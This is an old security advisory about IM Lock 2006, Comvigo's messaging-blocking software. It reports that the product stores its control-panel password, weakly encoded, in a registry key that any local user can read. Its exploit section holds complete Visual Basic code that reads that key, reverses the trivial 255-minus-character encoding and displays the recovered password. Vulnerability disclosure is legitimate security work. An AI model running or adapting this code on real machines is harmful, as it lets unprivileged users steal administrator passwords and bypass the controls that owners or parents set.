IM Lock 2006 - Insecure Registry Permission Vulnerability --------------------------------------------------------- Application: IM Lock 2006 Vendor: www.comvigo.com Corporation: Comvigo, Inc. Version: Latest: (2 March 2006) - Home Edition, Enterprise & Professional Description: IM Lock 2006 discloses passwords to local users. Background: =========== Security Auditing & Management software, IM Lock controls and blocks access to Instant Messaging and peer to peer services that waste time and that can infect computers with viruses. Blocks all popular services: MSN Messenger, Yahoo Messenger, ICQ, AIM, Skype, eMule, iTunes, ... We use several algorithms to detect and lock applications, working portion of IM Lock is virtually invisible to the computer user. Vulnerability: ============== Encrypted password is stored in the registry, this key is readable by non-privileged users on the system, so by decoding password, a malicious user could gain access of config panel. Exploit: ======== ' ############################################################################ ' IM Lock 2006 - Local Password Encryption Weakness Exploit by fRoGGz ' Versions: Home Edition, Enterprise & Professional ' Application: IM Lock 2006 ' Distributor : Comvigo, Inc. ' Link: http://www.comvigo.com ' Vulnerable Description: IM Lock 2006 discloses passwords to local users. ' ' Discovered & Coded by fRoGGz ' Credits to: SecuBox Labs - shadock.secubox.com ' ' ############################################################################ Private Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) As Long Private Declare Function RegOpenKey Lib "advapi32.dll" Alias "RegOpenKeyA" _ (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long Private Declare Function RegQueryValueEx Lib "advapi32.dll" Alias "RegQueryValueExA" _ (ByVal hKey As Long, _ ByVal lpValueName As String, _ ByVal lpReserved As Long, _ lpType As Long, _ lpData As Any, _ lpcbData As Long) As Long Dim i As Integer Dim GetCrypt, Decrypt As String Public Function GrabBDR(hKey As Long, strPath As String, strValue As String) As String Dim keyhand As Long Dim lResult As Long Dim strBuf As String Dim lDataBufSize As Long Dim intZeroPos As Integer Dim sBuffer As String r = RegOpenKey(hKey, strPath, keyhand) lResult = RegQueryValueEx(keyhand, strValue, 0&, lValueType, ByVal 0&, lDataBufSize) If lValueType = 1 Then strBuf = String(lDataBufSize, " ") lResult = RegQueryValueEx(keyhand, strValue, 0&, 0&, ByVal strBuf, lDataBufSize) If lResult = ERROR_SUCCESS Then intZeroPos = InStr(strBuf, Chr$(0)) If intZeroPos > 0 Then GrabBDR = Left$(strBuf, intZeroPos - 1) End If End If lResult = RegCloseKey(hKey) End If End Function Private Sub Form_Load() GetCrypt = GrabBDR(&H80000002, "SOFTWARE\Microsoft\SvcHst\msnvs", "prc") If GetCrypt <> "" Then For i = 1 To Len(GetCrypt) Decrypt = Decrypt & Chr(255 - Asc(Mid(GetCrypt, i, 1))) Next MsgBox "ENCRYPT PASSWORD FOUND !" & vbCrLf & "YOUR PASSWORD IS: " & Decrypt, _ vbOKOnly, "Secubox Labs - Recovery" Else MsgBox "NO ENCRYPT PASSWORD FOUND !", vbCritical, "IM LOCK INSTALLED ?" End If End End Sub CREDiTS: ======== fRoGGz - unsecure[at]writeme[dot]com SecuBox Labs - secubox.shadock.net -- ___________________________________________________ Play 100s of games for FREE! http://games.mail.com/